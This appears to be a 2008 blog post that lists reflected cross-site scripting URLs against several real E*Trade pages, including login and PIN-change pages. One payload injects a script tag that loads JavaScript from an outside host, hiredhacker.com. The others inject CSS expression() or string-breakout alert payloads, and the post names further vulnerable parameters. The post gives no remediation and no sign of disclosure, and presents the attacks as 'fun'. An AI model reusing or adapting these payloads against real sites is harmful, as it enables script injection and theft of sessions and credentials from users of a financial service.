Fun with E*Trade

November 4th, 2008  | Tags: ,

Most of these require the user to be logged in, and for those who don’t know, the ‘expression’ technique only works on IE. You will need to use a different method if you want to test it on other browsers. See Rsnakes cheat sheet for exmaples.


https://www.etrade.wallst.com/v1/stocks/snapshot/symbol_lookup.asp?textIn=%22%3E%3Cscript%20src=%22http://www.hiredhacker.com/xss.js%22%3E%3C/script%3E


https://us.etrade.com/e/t/accounts/changemyivrpin?FROM_PAGE=changemypasswords%22+style=%22width:expression(alert(/owned/))


https://express.etrade.com/e/t/applogic/OLAMasterpage2?SC=NPNK4KV%22+style=%22width:expression(alert(/owned/))


https://us.etrade.com/e/t/user/login?TYPE=&REALMOID=&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=&TARGET=%22+style=%22width:expression(alert(/owned/))


https://global.etrade.com/e/t/intl/page?nav=3&subnav=4&screen=1%27;alert(/owned/);//&language=en&country=gl

(nav and subnav are also vulnerable parameters)
Share and Enjoy:
  • Facebook
  • HackerNews
  • Reddit
  • Digg
  • del.icio.us
  • Twitter
  • StumbleUpon
  • LinkedIn
  • Google Bookmarks
  • Slashdot
  • Technorati
  • email
  • DZone
  • Suggest to Techmeme via Twitter
  • RSS
  • PDF
  • Print
Leave a comment | Trackback
« »
No comments yet.

TOP